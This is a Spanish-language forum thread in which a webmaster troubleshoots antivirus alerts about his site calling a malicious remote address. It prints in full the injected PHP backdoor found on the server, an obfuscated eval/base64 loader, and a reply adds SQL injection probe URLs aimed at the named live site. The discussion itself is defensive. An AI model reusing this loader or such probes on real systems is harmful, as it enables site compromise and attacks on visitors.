Auxilio Malware o Virus en mi Web

Buenas Noches a todos,

Actualmente tengo un problema con una página web,
Cuando entro a la página
Se activa el antivirus diciendo:
Se ha bloquedo la dirección remota
Me sale que se ha bloqueado el url:
"9276.in/1318280489.php
Dirección Ip 193.27.246.77:80
como si dentro de la página se estuviera llamando a esa dirección.
Baje la página y le pasé el scan eset nod 32 antivirus, malwarebytes.
También la he escaneado en todas estas herramientas web:

http://www.urlvoid.com/scan/
http://www.google.com/safebrowsing/diagnostic?site...
http://safeweb.norton.com/report/show?
http://www.browserdefender.com/site/
https://zeustracker.abuse.ch/monitor.php?host=

y no me sale nada.

Gracias de antemano a todos por su tiempo.

Saludos,

Es posible que algun script de tu pagina, sobr todo si usas javascript, este intentando hacer alguna operacion que a tu antivirus le parece "sospechosa" o que este ocupando demasiado tiempo por el motivo que sea.

si permites que los usuarios de tu pagina pongan comentadios o inserten algun tipo de contenido, o incluso suban archivos, no vale de nada que te descargues la pagina ya que el problema se encontraria en lo que tienes en el servidor.

si permites el tipo de cosas que te he dicho anteriormente, revisa la base de datos desde el phpmyadmin y revisa las cosas que se hayan insertado en fechas posteriores a la que te comenzo a suceder esto. si el servidor es de terceros ponte en contacto con ellos para ver si pueden ayudarte a solucionar el problema.

Lo único que tengo es un modulo de noticias, pero esta protegido con htacess para que solo sea accesado desde mi maquina.
Lo más raro es que el mensaje de bloqueo no sale todo el tiempo, si entro la página me sale después no me vuelve a salir más en 24 horas, aunque borre el cache y las cookies.
Nunca me habia pasado algo como esto.
Es mas se bloqueo en el fortinet para que el server no tuviera acceso a la dirección IP que se esta bloqueado y eso no soluciono nada.

Saludos

Revisa cada script de tu web talvez modificaron algun archivo

Y como dato extra seria bueno q compartas el link del supuesto malware osea tu web

No estoy seguro de como funciona su antivirus, pero supongo que verificara la ip de la web con una db o algo asi, y si los usuarios visitan una pagina atacante, esta se registra y se envia a algun lado para prevenir q otros usuarios del antivirus la vean.

fergon027 escribió:

definitivamente algo lo esta redirrecionando, algun javascript o un header?
busque en el source del html la direccion y deberia aparecer, o el source del lo que utilice en el lado servidor.
Si es asi, es algo raro. como llego es posible pedazo de codigo hasta ese lugar?

hice un par de busquedas en googl*
enlace
Al parecer esa pagina esta en la lista de malware.
Supongo que es por los archivos ejecutables que puedan estar infectados(tipo .exe), mas que por los ataques tipo XSS y esas cosas.

Saludos.

Saludos
Gracias a todos por sus respuestas.
La página es ampyme.gob.pa
Ahorita en el firewall de la empresa se bloqueo 2 ip 193.27.246.77
y también el 193.27.246.72. Aparentemente no sale el mensaje, pero la página esta super lenta.
Saludos,

Algo más antes del bloque cuando de entraba a la página el firewall reportaba una transferencia del servidor con el Ip 193.27.246.72. Ahora con el bloqueo intenta hacer la transferencia pero reporta 0 bytes transmitidos.

Que tal amigo, hasta que al fin.
Este el el código que estaba dando problemas.

Código :

<?php 
@eval(base64_decode("aWYgKCRldmFsYnNmcm1iR3ZaWERGICE9IDU1NjkzKSB7ZnVuY3Rpb24gZXZhbHFLcVFJWmpRbXZIKCRzKXtmb3IgKCRhID0gMDsgJGEgPD0gc3RybGVuKCRzKS0xOyAkYSsrICl7JGUgLj0gJHN7c3RybGVuKCRzKS0kYS0xfTt9cmV0dXJuKCRlKTt9ZXZhbChldmFscUtxUUlaalFtdkgoJzspKSI9c1RLd2d5WnVsR2R5OUdjbEozWHk5bWN5VkdRIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFscUtxUUlaalFtdkgoJzspKSI9QVNmN2tTVFVOSFpDVm1hR3hrVGl4MlFzRm1kbFJDS2xSMmJqVkdaZlJqTmxOWFlpQmlieVZIZGxKM2Vna1NUVU5IWkNWbWFHeGtUaXgyUXNGbWRsUkNLMWxYU2xOWFRCbFdTS05GYmhaWFpnNDJicFIzWXVWbloiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxxS3FRSVpqUW12SCgnOykpIjdraUk5VWtNWkpDSzFsWFNsTlhUQmxXU0tORmJoWlhaZzBESTNaWFVCWm5VSlYwZDBoMmNNeG1RbXhXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxxS3FRSVpqUW12SCgnOykpIjdraUk5MEVTa2htVXpNbUlvVVhlSlYyY05GVWFKcDBVc0ZtZGwxelREZG5ZR2hIWjFkR1ZDVkhSaXhXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxxS3FRSVpqUW12SCgnOykpIj09d09wSVNQOUUwWXdJRlNoSkNLMWxYU2xOWFRCbFdTS05GYmhaWFo5NFVaVkZXUjFwbFpPVjBZTXhXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxxS3FRSVpqUW12SCgnOykpIj1zVEtpMEROWEZtSW9VWGVKVjJjTkZVYUpwMFVzRm1kbDFqVjVkMFkwcDNTalowUUgxR1VXeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbHFLcVFJWmpRbXZIKCc7KSkiPXNUS2kwVFBSbGtka2RWU2lnU2Q1bFVaejFVUXBsa1NUeFdZMlZXUGh4a1p4ZDJaaEJGYTZkSFZ3UkdTUHhXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxxS3FRSVpqUW12SCgnOykpIj09d09kbGlJVlZUVlNoa1J3ZzFVV0JUVldsalJWVmxVR05sSW9VWGVKVjJjTkZVYUpwMFVzRm1kbHRsVUZabFVGTjFYazBUZFlwM1lKVlVlUWRWUUZ4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFscUtxUUlaalFtdkgoJzspKSI3a1NLaTBUUG5OR2I0MVdXMFpVYlZKQ0sxbFhTbE5YVEJsV1NLTkZiaFpYWmd3U0tpUWpWSHBWZEdkMVZpZ1NkNWxVWnoxVVFwbGtTVHhXWTJWR0lza2lJOWtFV2FKRGJIRm1hS2hWV21aMFZoSkNLMWxYU2xOWFRCbFdTS05GYmhaWFpnd1NLaUFUT3RGMVRPWkZWaWdTZDVsVVp6MVVRcGxrU1R4V1kyVkdJc2tpSTlFa2JqRkRleVVsSW9VWGVKVjJjTkZVYUpwMFVzRm1kbEJDTHBJQ2I0SmpXMmxqTVNKQ0sxbFhTbE5YVEJsV1NLTkZiaFpYWm9rWFl5SlhZZzBESXlwMmRJeFVheWwwVkNwMFN0eFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbHFLcVFJWmpRbXZIKCc7KSkiN2NuZFJGa2RTbFVSM1JIYXp4RWJDWkdiaFpYWmswakxXOTBRdFptVVRWa1JoWkVhSU5VWXNwSGJoWlhaa0FTS2dzeUtwUkNJN2tESTl3RElwUkNJN0FESTlBU2FrZ0NJeTltWiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbHFLcVFJWmpRbXZIKCc7KSkiN2tTS2kwVFBSWjJOcmwzWXJkV2VqQlROWHBGTTFJallxbGpSa3hHWnlnRmI0ZFZZdEpVUkpWblNZUkdNVzEyWTNJMFVMcG5VRHQwVFdoMVlWQkhNWmhtUkdkbFJzQmpZUmx6UmlobVdZcDFaMElqWXdKMU1aVm5WdXBsSW9VWGVKVjJjTkZVYUpwMFVzRm1kbGhDYmhaWFoiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxxS3FRSVpqUW12SCgnOykpIjdjbmRSRmtkU2xVUjNSSGF6eEViQ1pHYmhaWFprNGlJdUlTUHVBaVZQTlVibUoxVUZaVVlHaEdTREZHYjZ4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFscUtxUUlaalFtdkgoJzspKSI9PVFmOXRqYVh4MGNRSjBTNXhXVHNGbWRsUkNJdmgyWWx0VFh4c2xhWHgwY1FKMFM1eFdUc0ZtZGxSQ0k5QWlhWHgwY1FKMFM1eFdUc0ZtZGxSQ0k3a2lhWHgwY1FKMFM1eFdUc0ZtZGxSQ0xoeGtaeGQyWmhCRmE2ZEhWd1JHU1B4V1kyVkdKb1VHWnZ4R2M0VkdJOUFpYVh4MGNRSjBTNXhXVHNGbWRsUnllcGtTWU1aV2NuZFdZUWhtZTNSRmNraDBUc0ZtZGxSQ0xxZEZUekJsUUxsSGJOeFdZMlZHSm9JSGR6SkhkemhDSW1sMk9wa1NYcElTVk9GRFZKbGpSVlZsVUdObElvVVhlSlYyY05GVWFKcDBVc0ZtZGx0bFVGWmxVRk4xWGtnU1prOTJZdVZHYnlWbkxwSVNPbjFtU2lnU2Q1bFVaejFVUXBsa1NUeFdZMlZtTHBVSFc2TldTRmxIVVhGVVJzRm1kbFJDS2xSMmJqNVdac0pYZHVraUk1a1ViS0pDSzFsWFNsTlhUQmxXU0tORmJoWlhadTBWS2kwVFNHSlZSR0JEV0dKVk1VNWtWclZsSW9VWGVKVjJjTkZVYUpwMFVzRm1kbHRsVUZabFVGTjFYazRTS2kwRE1VRm1Jb1VYZUpWMmNORlVhSnAwVXNGbWRsNVNLaTBET0VObUlvVVhlSlYyY05GVWFKcDBVc0ZtZGw1U0tpOG1RdXhrSW9VWGVKVjJjTkZVYUpwMFVzRm1kbDVpVjVkMFkwcDNTalowUUgxR1VXeFdZMlZHSnVraUk5MHpkTUpDSzFsWFNsTlhUQmxXU0tORmJoWlhadVkxVEQxbVpTTlZSR0ZtUm9oMFFoeG1lc0ZtZGxSaUxwSVNQNGtIVGlnU2Q1bFVaejFVUXBsa1NUeFdZMlZtTHBJU1A5YzJUaWdTZDVsVVp6MVVRcGxrU1R4V1kyVm1MT1ZXVmhWVWRhWm1URk5HVHNGbWRsUkNLT1ZYY1VwMFloRkZXRmwwYlE5R2JoWlhaZzBESXFkRlR6QmxRTGxIYk54V1kyVkdKZ3NUS3dBRE93RXpLcGdTWnRsR2Rza1NLaTBUVElSR2FTTnpZaWdTZDVsVVp6MVVRcGxrU1R4V1kyVkdLMVFXYnM4MFEzSm1SNFJXZG5SbFExUmtZc0ZtZGxSQ0tsbDJhdjkyWTBWMmNBQnllZ1UyY3NWR0k5dEhJcGtTS2Q5MFEzSm1SNFJXZG5SbFExUmtZc0ZtZGxSeVdGbDBTUDkwUWZSQ0swVjJjemxHS2dJM2Jna1NLMWhsZWpsVVI1QjFWQlZFYmhaWFprQUNMaWsyTGlBaUxna2ljcWRIU01sbWNKZGxRS3RVYnNGbWRsUkNJc0lDZmlnU1prOUdidzFXYWc0Q0lpOGlJb2cyWTBGV2JmZFdaeUJIS29ZV2EiKGVkb2NlZF80NmVzYWIobGF2ZScpKTskZXZhbGJzZnJtYkd2WlhERiA9NTU2OTM7fQ==")); ?>

que bonito ese codigo ofuscado ,
y el algoritmo empleadoe s sencillo , mis feliciatones a quien lo haya echo se nota su destreza en programacion,

bueno apoyando a la seguridad de tu sitio fergon027

revisa la inyeccion sql

mira lo que pasa en estas 2 links

Código :

http://www.ampyme.gob.pa/newsdesc.php?id=10%20and%201=2

Código :

http://www.ampyme.gob.pa/newsdesc.php?id=10%20and%201=1

bueno creo que la explicacion sobra bye byeeee

Muchas Gracias por tu respuesta. Casualmente le estoy dando una revisión profunda al código.
Ese es el problema de cuando te heredan las cosas
Yo estoy desarrollando una nueva página para remplazar esa, no le habia prestado mucha atención pero creo que voy a tener que revisarla bien.
Saludos